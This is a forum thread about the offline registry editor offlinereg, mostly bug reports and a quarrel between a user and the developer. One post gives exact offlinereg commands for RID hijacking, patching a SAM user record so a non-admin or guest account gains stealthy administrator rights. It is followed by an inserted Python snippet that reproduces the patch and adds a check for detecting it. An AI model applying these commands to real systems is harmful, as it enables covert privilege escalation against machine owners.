offlinereg
292 replies to this topic

#276 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  • United Kingdom

Posted 4 weeks ago

You forgot to fix this one. Leftovers. 
Edit: It seems to work fine. 

 

Also reg.exe cannot be a replacement because it doesn't ignore permissions. 


Edited by osfixer, 4 weeks ago.


#277 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  • United Kingdom

Posted 4 weeks ago

What you could also do is add support for adjusting permissions for keys and values. 

This could be done only through command line I think. 

 

Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?

If it doesn't, you can add an /inherit switch.

DWORD
ORAPI
ORGetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
_Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD
ORAPI
ORSetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);

Edited by osfixer, 4 weeks ago.


#278 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  • France

Posted 3 weeks ago

Following a post here on how to blank an account's password using offlinereg, this time let's see how to perform "RID hijacking".

The local admin account has a 01F4 RID.
What about "patching" another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin tasks.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trusts SAMSRV and SAMSRV trusts the registry: everyone is happy...

This can work with the guest account as well.

I tested this with success from WinPE against Windows 10.
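The post above patches two bytes of the F value by hand. The following is an added example (not offlinereg code and not from the post's author) that does the same byte-level operation on a constructed F blob, derives the exact (offset, value) writes the two setvaluebyteat calls perform, and adds the check a defender would run over an offline SAM: every key under sam\domains\account\users is named after its RID in hex, so a key whose F value carries a different RID at offset 0x30 is a hijacking indicator. The F_SIZE constant and the sample blobs are constructed; only the RID field at offset 0x30 is taken from the post.

```python
"""Parse, patch and audit the RID field of a SAM user key's F value.

Added example, not code from offlinereg. The only layout fact used is the
one in the forum post: the 4-byte little-endian RID sits at offset 0x30.
All F blobs here are constructed, not dumped from a real machine.
"""
import struct
from typing import Dict, List, Tuple

RID_OFFSET = 0x30      # the post's "offset 30h (48 in decimal form)"
ADMIN_RID = 0x1F4      # built-in Administrator RID the post writes (bytes f4 01)
F_SIZE = 0x50          # assumed size of the constructed blob; only the RID field matters


def make_f_value(rid: int) -> bytes:
    """Constructed F value: zero-filled except for the little-endian RID at 0x30."""
    buf = bytearray(F_SIZE)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def rid_from_f(f_value: bytes) -> int:
    """Read the RID the way SAMSRV will: 4 bytes little-endian at offset 0x30."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to hold a RID")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def rid_from_key_name(key_path: str) -> int:
    r"""sam\domains\account\users\000003e8 -> 1000: the key name is the RID in hex."""
    return int(key_path.rsplit("\\", 1)[-1], 16)


def set_rid(f_value: bytes, new_rid: int) -> bytes:
    """Rewrite the RID field; this is what the two setvaluebyteat calls achieve."""
    buf = bytearray(f_value)
    struct.pack_into("<I", buf, RID_OFFSET, new_rid)
    return bytes(buf)


def byte_patches(old: bytes, new: bytes) -> List[Tuple[int, int]]:
    """(offset, value) pairs that changed, i.e. the per-byte writes offlinereg needs."""
    return [(i, b) for i, (a, b) in enumerate(zip(old, new)) if a != b]


def find_hijacked(users: Dict[str, bytes]) -> List[Tuple[str, int, int]]:
    """Defender check: report every user key whose F RID disagrees with its key name."""
    findings = []
    for key_path, f_value in sorted(users.items()):
        name_rid = rid_from_key_name(key_path)
        f_rid = rid_from_f(f_value)
        if name_rid != f_rid:
            findings.append((key_path, name_rid, f_rid))
    return findings


if __name__ == "__main__":
    base = r"sam\domains\account\users"
    original = make_f_value(0x3E8)           # RID 1000, stored as e8 03 00 00
    hijacked = set_rid(original, ADMIN_RID)  # RID 500,  stored as f4 01 00 00
    print("writes needed:", byte_patches(original, hijacked))
    hive = {f"{base}\\000001f4": make_f_value(ADMIN_RID), f"{base}\\000003e8": hijacked}
    for key_path, name_rid, f_rid in find_hijacked(hive):
        print(f"{key_path}: key name says RID {name_rid}, F value says {f_rid}")
```

On a real hive the same check can be driven by exporting each user key's F value with offlinereg's getvalue and feeding the bytes to find_hijacked; a mismatch between the key name and the F value is exactly the "stealthy" state the post describes, since group membership is untouched.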



#279 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  • Italy

Posted 3 weeks ago

This can work with the guest account as well.


Nice :)

And once again all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it



#280 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  • France

Posted 3 weeks ago

Nice :)

And once again all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

 

Absolutely agree.

 

BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type the BIOS password, but it is perfectly valid in a home environment.

 

Disk encryption like BitLocker addresses a lot of these "local" attacks, although I feel BitLocker could shortly be broken without even having to get the key from the TPM chip...



#281 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  • Italy

Posted 3 weeks ago

BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type this password, but it is perfectly valid in a home environment.

 

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.



#282 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  • France

Posted 3 weeks ago

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

 

I work in a big corp environment and it is already a PITA to enforce usernames which are vaguely connected to the actual user name (x letters for country code, x letters for division, x letters for first name, x letters for last name, etc.), thus regularly witnessing users who forget their username because it is so cryptic.

And then an 8+ character password which has to include digits AND non-alphanumeric chars, with a policy preventing the use of the last 16 passwords...

 

That alone is enough to keep dozens of IT ppl busy every day :)

I can see the massive nervous breakdown it would be if we were to ask to remember the computer BIOS password.

 

Now, on the good side, in big corp environments SSO/delegation makes it so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall though: if the user credentials get compromised, all apps get compromised...

 

Security is a never ending discussion.

I like to play the red team sec guy - I really would not want to be a blue team sec guy :)



#283 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  • Italy

Posted 3 weeks ago

That alone is enough to keep dozens of IT ppl busy every day :)

 

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

Usual activities of IT people I know:

1) Saying NO, it is NOT possible to whatever request

2) In a few cases say Yes, it is possible but we need six months time and hire an external programmer.

3) In all other cases do something (usually trivial) and make it seem like it is:

a. difficult

b. possibly very, very difficult

c. even better, very, very difficult AND tiring

 

:duff:

Wonko



#284 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  • France

Posted 3 weeks ago

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

...

 

Sounds like you have had bad experiences with IT departments :)

 

Running an IT dpt, I have a different experience.

A good dpt will be organised in different levels using ITIL processes and based on a service catalog with SLAs:

-level 1 facing users with one task: solve the issue/address the request in less than 30 min max, with an objective of 60% of all tickets solved in L1

-level 2 specialised in different fields (networks, systems, etc.), mainly focusing on more complex requests, with an objective of 30% of all tickets solved in L2

-level 3 specialised in a field (network for example) AND a platform/solution (Checkpoint/Fortigate/etc.), liaising with vendors/editors if it really needs to

 

Each team needs to cascade proper documentation/delegation to other teams to ensure each team can deal with incidents/requests in a timely and efficient manner.

 

Now I am more into IT Ops and I appreciate that addressing new needs, especially around apps, is quite different and possibly deals more with project management.

 

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do, which leads to nice discussions :)

 

Now, maybe we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive :lol:



#285 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  • Italy

Posted 3 weeks ago

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do, which leads to nice discussions :)

 

So you have two separate but concurrent reports by two people that - for different reasons - are by definition always right ;).

 

Your particular IT department   :worship:  is then definitely the exception that confirms the rule. 

 

 

Now, maybe we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive :lol:

Agreed :)

 

:duff:

Wonko



#286 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  • United Kingdom

Posted 2 weeks ago

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

offlinereg-win64 "H:\Windows\System32\config\SYSTEM" " " import secpol.reg

[ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
main error:Access violation
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
"Machine"="" ; Network access: Remotely accessible registry paths (None).

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedPaths]
"Machine"="" ; Network access: Remotely accessible registry paths and subpaths (None).

Edited by osfixer, 2 weeks ago.


#287 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  • France

Posted 2 weeks ago

 

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

 

Good news for you is that you don't have to use it: life is good! :)

It is not as if I had not warned you several times that I have put little effort into the import command and that you should prefer reg load/unload for this specific matter...



#288 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  • United Kingdom

Posted 2 weeks ago

So you are intentionally not fixing bugs? That is really weird.



#289 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  • France

Posted 2 weeks ago

So you are intentionally not fixing bugs? That is really weird.

 

Not exactly.

I am intentionally defining my priorities.

Nothing weird there: I believe all human beings do so.



#290 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  • United Kingdom

Posted 2 weeks ago

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..


Edited by osfixer, 2 weeks ago.


#291 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  • France

Posted 2 weeks ago

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..

 

Let's stop the discussion there.

You don't like the tool? You know of other tools? All fine with me.

 

I am not asking for any credit, but at the same time I will not accept negative comments nor will I try to decrypt your understatements.

 

You have been gently warned.

Don't spoil my fun.



#292 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  • United Kingdom

Posted 2 weeks ago

Instead of saying thanks for discovering your bugs in your software, you are
now saying sorry can't do. Heh.



#293 darren rose

darren rose

    Frequent Member

  • Advanced user
  • 438 posts
  • Location:Norwich, Norfolk
  • United Kingdom

Posted 2 weeks ago

@osfixer - I really don't know what your problem is or why you are giving erwan.l attitude. He creates tools for us to use for free out of kindness; he has a job to do like all of us, so can only devote limited time to these projects. Why not just be grateful for what he does? If it doesn't do what you want then use something else. All of us here on this forum appreciate the work others do, and understand it is a hobby or side project; we don't demand fixes and then get stroppy when we don't like the answers. Perhaps take your attitude elsewhere.

 

@erwan.l - I personally thank you for all you do, and use some of your tools such as this one, which works well for me. I have always found you helpful and friendly, so just ignore comments from idiots like this who have no respect for the free tools you provide us with.





